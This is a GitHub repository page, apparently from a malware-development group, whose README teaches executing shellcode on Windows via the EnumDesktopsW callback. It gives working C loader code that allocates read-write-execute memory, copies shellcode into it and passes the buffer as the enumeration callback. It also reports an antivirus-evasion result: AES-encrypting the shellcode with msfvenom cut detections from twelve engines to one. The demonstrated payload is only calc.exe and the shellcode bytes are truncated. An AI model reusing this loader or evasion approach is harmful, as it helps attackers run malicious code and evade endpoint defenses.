Skip to content
/ Executing-Code-via-EnumDesktopsW-Callback Public

This repository demonstrates how to execute shellcode on a Windows machine using the `EnumDesktopsW` callback mechanism. It leverages memory allocation, shellcode injection, and callback execution for proof-of-concept.

malforge-group.in/
0 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

Malforge-Maldev-Public-Organization/Executing-Code-via-EnumDesktopsW-Callback

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
README.md
README.md
 
 
samplecode.c
samplecode.c
 
 

Repository files navigation

Execute Code via EnumDesktopsW Callback

Introduction

Welcome to this article! Today, I’ll demonstrate how you can execute shellcode on a Windows machine using the EnumDesktopsW callback function — a straightforward and effective technique.

What is EnumDesktopsW?

The EnumDesktopsW function is part of the Windows API and is used to enumerate the desktops available on a system. While typically benign, in some cases, this function can be abused by attackers as part of a broader strategy to gain access to sensitive data or execute arbitrary code.

How Can It Be Used to Execute Shellcode?

Shellcode is a compact sequence of instructions used to perform specific tasks, often malicious in nature. Here’s how EnumDesktopsW can be leveraged to execute shellcode:

  1. Memory Allocation: Allocate a memory region in the process using a function like VirtualAlloc.
  2. Copy Shellcode: Copy the shellcode into the allocated memory region.
  3. Execute Shellcode: Use EnumDesktopsW to execute the shellcode via a callback function pointer, typically by casting it to a DESKTOPENUMPROCW type.

Code Example

#include <windows.h>
#include <stdio.h>
#include "wingdi.h"

int main() {
    char shellcode[] = "..."; // truncated for brevity

    HANDLE hAlloc = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    memcpy(hAlloc, shellcode, sizeof(shellcode));
    EnumDesktopsW(GetProcessWindowStation(), (DESKTOPENUMPROCW) hAlloc, NULL);
    printf("%d", GetLastError());
    VirtualFree(hAlloc, 0, MEM_RELEASE);
}

This example works as follows:

  • VirtualAlloc: Allocates executable memory.
  • memcpy: Copies the shellcode into the memory region.
  • EnumDesktopsW: Executes the shellcode using the callback.
  • VirtualFree: Frees the memory after use.

Proof of Concept

The shellcode in this example spawns the Windows Calculator (calc.exe). When executed, the code should successfully launch the calculator.

image

Detection

When uploaded to AntiScan.me, the raw shellcode was detected by 12 antivirus engines.

image

However, after encrypting the shellcode using AES (e.g., with msfvenom), only one AV (Ahnlab V3) detected it.

image

Conclusion

That’s all it takes to execute shellcode on a Windows machine using the EnumDesktopsW API. I hope you found this article useful — stay tuned for more content!

About

This repository demonstrates how to execute shellcode on a Windows machine using the `EnumDesktopsW` callback mechanism. It leverages memory allocation, shellcode injection, and callback execution for proof-of-concept.

malforge-group.in/

Topics

windows malware codeinjection redteam

Resources

Readme
Activity
Custom properties

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages